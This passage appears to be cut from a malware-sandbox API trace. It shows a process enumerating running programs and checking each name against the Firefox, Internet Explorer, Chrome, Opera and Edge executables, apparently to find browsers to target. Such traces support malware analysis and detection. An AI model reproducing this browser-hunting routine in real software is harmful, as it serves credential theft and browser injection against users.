(lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.414] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.414] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.414] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.414] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.414] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.414] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.414] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.414] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.414] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0165.415] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0165.415] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0165.415] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0165.415] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0165.415] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0165.416] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0165.416] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0165.416] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0165.416] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0165.416] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0165.417] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0165.417] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0165.417] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0165.417] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0165.417] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.417] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.417] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.417] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.417] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.417] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0165.418] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0165.418] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0165.418] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0165.418] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0165.418] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.418] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0165.419] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0165.419] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0165.419] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0165.419] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0165.419] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0165.419] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0165.419] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0165.419] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0165.419] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0165.419] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0165.420] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0165.420] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0165.420] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0165.420] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0165.420] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.420] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0165.421] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0165.421] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0165.421] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0165.421] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0165.421] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.421] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0165.421] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0165.421] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0165.421] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0165.421] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0165.421] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.421] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0165.422] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0165.422] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0165.422] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0165.422] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0165.422] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.422] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0165.422] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0165.422] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0165.422] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0165.422] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0165.422] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0165.423] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0165.423] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0165.423] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0165.423] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0165.423] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0165.424] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0165.424] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0165.424] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0165.424] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0165.424] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0165.424] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0165.424] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0165.424] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0165.424] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0165.424] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0165.425] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0165.425] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0165.425] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0165.425] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0165.425] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.425] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0165.426] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0165.426] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0165.426] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0165.426] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0165.426] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0165.426] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0165.426] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0165.426] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0165.426] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0165.426] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0165.427] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0165.427] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0165.427] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0165.427] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0165.427] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.427] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0165.427] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0165.427] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0165.427] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0165.428] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0165.428] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.428] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0165.428] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0165.428] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0165.428] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0165.428] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0165.428] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.428] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0165.429] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0165.429] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0165.429] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0165.429] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0165.429] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0165.429] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0165.429] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0165.429] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0165.429] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0165.429] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0165.430] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0165.430] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0165.430] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0165.430] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0165.430] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.430] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0165.431] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0165.431] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0165.431] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0165.431] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0165.431] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.431] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0165.431] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0165.431] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0165.431] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0165.431] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0165.431] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.431] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0165.432] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0165.432] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0165.432] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0165.432] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0165.432] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.432] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.433] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.433] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.433] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.433] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.433] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.433] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0165.433] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0165.433] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0165.433] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0165.433] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0165.433] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.433] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.434] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.434] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.434] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.434] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.434] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.434] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0165.434] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0165.434] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0165.434] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0165.434] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0165.435] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.435] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.435] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.435] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.435] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.435] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.435] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.435] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.568] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.568] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.568] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.568] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0165.568] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.568] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0165.568] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0165.568] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0165.568] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0165.568] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0165.568] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.568] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0165.569] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0165.569] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0165.569] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0165.569] lstrcmpiA 